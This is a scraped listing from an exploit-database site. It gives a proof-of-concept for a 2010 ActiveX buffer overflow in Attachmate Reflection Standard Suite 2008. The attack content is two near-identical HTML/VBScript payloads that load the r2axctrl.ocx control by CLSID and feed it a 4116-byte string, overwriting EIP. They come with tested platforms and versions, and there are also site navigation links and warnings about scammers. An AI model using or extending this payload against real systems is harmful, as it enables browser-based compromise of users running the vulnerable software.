0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Reflection Attachmate Reflection Standard Suite 2008 ActiveX BOF
============================================================================ Reflection Attachmate Reflection Standard Suite 2008 ActiveX Buffer Overflow ============================================================================ # Exploit Title: Reflection Attachmate Reflection Standard Suite 2008 activex buffer overflow # Date: Mar 11, 2010 found # Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm # Version: 13.0 & 14.0 # Tested on: WinXP SP3 & Win7 64bit # CVE : None yet Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a buffer overflow that could be triggered via activex. when r2axctrl.ocx is sent large string to the Reflection for UNIX & OpenVMS control class a crash happens that overwrites EIP with 41414141. # Code : [PoC exploit below] ______________________________________________________________________________ <html> PoC1 <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' /> <script language='vbscript'> 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx" prototype = "Property Let ControlID As String" memberName = "ControlID" progid = "R2AXCTRLLib.R2winCtrl" argCount = 1 arg1=String(4116, "A") target.ControlID = arg1 </script></job></package></html> ___________________________________________________________________________________ May need to throw a refresh to trigger PoC2 completely __________________________________________________________________________________ <html> PoC2 <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' /> <script language='vbscript'> 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\ReflectionsX\r2axctrl.ocx" prototype = "Property Let ControlID As String" memberName = "ControlID" progid = "R2AXCTRLLib.R2winCtrl" argCount = 1 arg1=String(4116, "A") target.ControlID = arg1 </script></job></package></html> # 0day.today [2024-07-05] #